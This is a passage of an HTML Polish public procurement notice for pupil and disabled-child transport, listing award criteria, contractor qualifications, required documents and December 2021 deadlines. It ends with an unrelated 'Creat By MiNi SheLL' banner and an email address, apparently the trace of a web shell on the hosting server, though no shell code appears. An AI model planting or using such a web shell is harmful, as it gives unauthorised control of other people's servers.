class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane według następujących kryteriów i wag:<br/>Cena (C) - waga 60 % – cena brutto ogółem z Formularza ofertowego;<br/>Parametry Techniczne – P (40% waga) – zgodnie z oświadczeniem zawartym w Formularzu<br/>ofertowym.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Wykonawca ubiegający się o zamówienie musi posiadać aktualną licencję na wykonywanie<br/>transportu drogowego osób<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, iż Wykonawca posiada zdolność techniczną lub zawodową jeżeli wykaże,<br/>że: w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wykonał co najmniej jedną usługę w zakresie przewozu<br/>osób niepełnosprawnych o wartości nie mniejszej niż 150.000,00 zł<br/>Oraz dysponuje następującymi osobami:<br/>• Osoby pełniące funkcję kierowcy: minimum 2 kierowców<br/>Wykonawca przedstawi minimum 2 kierowców, którzy będą uczestniczyć w wykonywaniu<br/>zamówienia posiadających uprawnienia, których obowiązek posiadania nakłada ustawa Prawo o<br/>ruchu drogowym - prawo jazdy min. kat. B, a także aktualne zaświadczenie o dopuszczeniu do<br/>wykonywania zawodu kierowcy wydane przez uprawnionego lekarza do badania kierowców i<br/>przeszkolenie w zakresie przepisów BHP i ppoż. oraz udzielania pierwszej pomocy<br/>• Osoby odpowiedzialne za sprawowanie opieki nad przewożonymi uczniami – minimum 2<br/>opiekunów,<br/>Wykonawca przedstawi minimum dwie takie osoby, które posiadają właściwe kwalifikacje do<br/>wykonywania podstawowych czynności pielęgnacyjno - opiekuńczych wobec dzieci i<br/>zaświadczenie o przeszkoleniu w zakresie przepisów BHP i ppoż. oraz udzielania pierwszej<br/>pomocy. Uwaga: Ze względu na specyfikę świadczonej usługi osobą powołaną do sprawowania<br/>opieki nad dziećmi nie może być kierowca pojazdu dokonujący przewozu na ww. trasie.<br/>Zamawiający wymaga, aby Wykonawca dysponował wskazaną kadrą techniczną przez cały<br/>okres realizacji przedmiotu zamówienia.<br/>Oraz dysponuje narzędziami, wyposażeniem zakładu lub urządzeniami technicznymi<br/>dostępnymi wykonawcy usługi w celu wykonania zamówienia wraz z informacją o podstawie<br/>dysponowania tymi zasobami:<br/>a) minimum 2 pojazdami do przewozu osób, pojazdy oferowane do przewozu uczniów muszą<br/>być odpowiednio oznakowane i nie starsze niż 9 lat (wyprodukowane nie wcześniej niż w 2012<br/>r.) Pojazdy oferowane do przewozu uczniów muszą posiadać aktualne badanie techniczne oraz<br/>opłacone polisy ubezpieczeniowe pojazdu OC i NW. Pojazdy muszą posiadać taką liczbę miejsc<br/>siedzących, aby każdy uczeń oraz opiekun posiadali miejsce siedzące, w tym przynajmniej<br/>jeden samochód przystosowany do przewozu osób niepełnosprawnych, który posiada sprzęt<br/>ułatwiający wsiadanie i wysiadanie dziecku poruszającemu się na wózku, w postaci: wind lub<br/>najazdów dla wózków inwalidzkich oraz odpowiednie zabezpieczenia dla przewozu dzieci i<br/>wózków <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Informacja z Krajowego Rejestru Karnego w zakresie:<br/>a) art. 108 ust. 1 pkt 1 i 2 p.z.p.;<br/>b) art. 108 ust. 1 pkt 4 p.z.p., dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne 4) Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie<br/>zalega z opłacaniem podatków, wystawione nie wcześniej niż<br/>3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że Wykonawca<br/>zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z<br/>ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie,<br/>odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji<br/>właściwego organu;<br/>5) Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie<br/>zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawiony nie wcześniej niż<br/>3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że Wykonawca<br/>zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz<br/>z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie,<br/>odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji<br/>właściwego organu;<br/>6) Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 p.z.p.;<br/>Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w art. 125 ust.1 p.z.p., w zakresie podstaw wykluczenia z postępowania wskazanych<br/>przez zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 p.z.p.;<br/>b) art. 108 ust. 1 pkt 4 p.z.p., dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne<br/>tytułem środka zapobiegawczego;<br/>c) art. 108 ust. 1 pkt 6 p.z.p.;<br/>d) art. 109 ust. 1 pkt 1 p.z.p., odnośnie do naruszenia obowiązków dotyczących płatności podatków i<br/>opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych<br/>(Dz. U. z 2019 r. poz. 1170).<br/>e) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego<br/>na celu zakłócenie konkurencji Wzór oświadczenia stanowi Załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz sprzętu dostępnego Wykonawcy w celu realizacji zamówienia<br/>wraz<br/>z informacją dotyczącą podstawy dysponowania. Wzór wykazu stanowi załącznik nr 8 do SWZ;<br/>złożenia kserokopii, potwierdzonej za zgodność z oryginałem, licencji na wykonywanie transportu<br/>drogowego osób;<br/>zamówienie publiczne tytułem środka karnego;<br/>2) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,<br/>czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów -oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy; wzór wykazu stanowi załącznik nr 5 do SWZ.<br/>3) złożenia oświadczenia dotyczącego osób skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, odpowiedzialnych za sporządzenie dokumentacji wraz<br/>z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami wraz z dokumentem potwierdzającym posiadane przez<br/>projektanta doświadczenie; wzór wykazu stanowi załącznik nr 8 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia:<br/>Zmiany postanowień umowy wymagają formy pisemnej pod rygorem nieważności, dokonywane<br/>będą w formie aneksu i dotyczyć mogą jedynie przesłanek zawartych<br/>w art. 454 i art. 455 ustawy Prawo zamówień publicznych.<br/>4. Zamawiający dopuszcza możliwość zmiany umowy zgodnie z art. 455 ustawy – Prawo<br/>zamówień publicznych oraz w przypadkach określonych w § 1 ust. 4 umowy, tj. w zakresie<br/>zmian osobowych, w tym zmian liczby dzieci, adresów zamieszkania dowożonych dzieci lub<br/>adresów placówek <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-08 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert następuje za pośrednictwem platformy zakupowej dostępnej pod adresem internetowym https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-08 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com